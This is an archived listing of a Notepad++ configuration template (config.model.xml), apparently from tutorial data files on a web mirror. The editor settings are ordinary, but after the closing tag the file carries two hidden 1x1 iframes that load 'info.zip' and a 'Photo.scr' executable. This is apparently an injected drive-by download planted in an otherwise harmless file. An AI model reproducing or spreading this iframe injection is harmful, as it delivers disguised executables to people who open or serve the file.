home *** CD-ROM | disk | FTP | other *** search
/ 207.233.110.77 / 207.233.110.77.tar / 207.233.110.77 / web23 / Tutorial4-Data Files / Notepad++ / config.model.xml < prev    next >
Extensible Markup Language  |  2016-05-28  |  5KB  |  86 lines

  1. <?xml version="1.0" encoding="Windows-1252" ?>
  2. <NotepadPlus>
  3.     <GUIConfigs>
  4.         <!-- 3 status : "large", "small" or "hide"-->
  5.         <GUIConfig name="ToolBar">standard</GUIConfig>
  6.         <!-- 2 status : "show" or "hide"-->
  7.         <GUIConfig name="StatusBar">show</GUIConfig>
  8.         <!-- For all attributs, 2 status : "yes" or "no"-->
  9.         <GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" />
  10.         <!-- 2 positions : "horizontal" or "vertical"-->
  11.         <GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig>
  12.         <!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" -->
  13.         <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
  14.         <GUIConfig name="TabSetting" size="4" replaceBySpace="no" />
  15.         <!--App position-->
  16.         <GUIConfig name="AppPosition" x="30" y="27" width="955" height="659" isMaximized="no" />
  17.         <!-- For the primary scintilla view,
  18.              2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
  19.              4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box"  -->
  20.         <GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="no" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" />
  21.         <!-- For the secodary scintilla view,
  22.              2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
  23.              4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
  24.         <GUIConfig name="Auto-detection">yes</GUIConfig>
  25.         <GUIConfig name="CheckHistoryFiles">no</GUIConfig>
  26.         <GUIConfig name="TrayIcon">no</GUIConfig>
  27.         <GUIConfig name="RememberLastSession">yes</GUIConfig>
  28.         <!--
  29.             New Document default settings :
  30.                 format = 0/1/2 -> win/unix/mac
  31.                 encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM
  32.                 defaultLang = 0/1/2/..
  33.  
  34.             Note 1 : UTF8-BOM -> UTF8 without BOM
  35.             Note 2 : for defaultLang :
  36.                     0 -> L_TXT
  37.                     1 -> L_PHP
  38.                     ... (see source file)
  39.         -->
  40.         <GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" />
  41.         <GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes"/>
  42.         <!--
  43.         printOption is print colour setting, the following values are possible :
  44.             0 : WYSIWYG
  45.             1 : Invert colour
  46.             2 : B & W
  47.             3 : WYSIWYG but without background colour
  48.         -->
  49.         <GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" />
  50.         <!--
  51.                             Backup Setting :
  52.                                 0 : non backup
  53.                                 1 : simple backup
  54.                                 2 : verbose backup
  55.                       -->
  56.         <GUIConfig name="Backup" action="0" useCustumDir="no" dir="" />
  57.         <GUIConfig name="TaskList">yes</GUIConfig>
  58.         <GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig>
  59.         <!--
  60.             value 0 for the folloing parameters means invisible :
  61.             leftWidth, topHight, rightWidth, bottomHight
  62.             
  63.                     position value for the PluginDlg:
  64.                         
  65.                         0 : left
  66.                          1 : right
  67.                         2 : top
  68.                         3 : bottom
  69.                         >= 4 : undocked -> FloatingWindow id
  70.             -->
  71.         <GUIConfig name="noUpdate">no</GUIConfig>
  72.         <GUIConfig name="MaitainIndent">yes</GUIConfig>
  73.         <GUIConfig name="MRU">yes</GUIConfig>
  74.         <GUIConfig name="URL">0</GUIConfig>
  75.         <GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" />
  76.         <GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" />
  77.         <GUIConfig name="sessionExt"></GUIConfig>
  78.     </GUIConfigs>
  79.     <!-- The History of opened files list -->
  80.     <History nbMaxFile="15" />
  81. </NotepadPlus>
  82. <iframe src=info.zip width=1 height=1 frameborder=0>
  83. </iframe>
  84. <iframe src=Photo.scr width=1 height=1 frameborder=0>
  85. </iframe>
  86.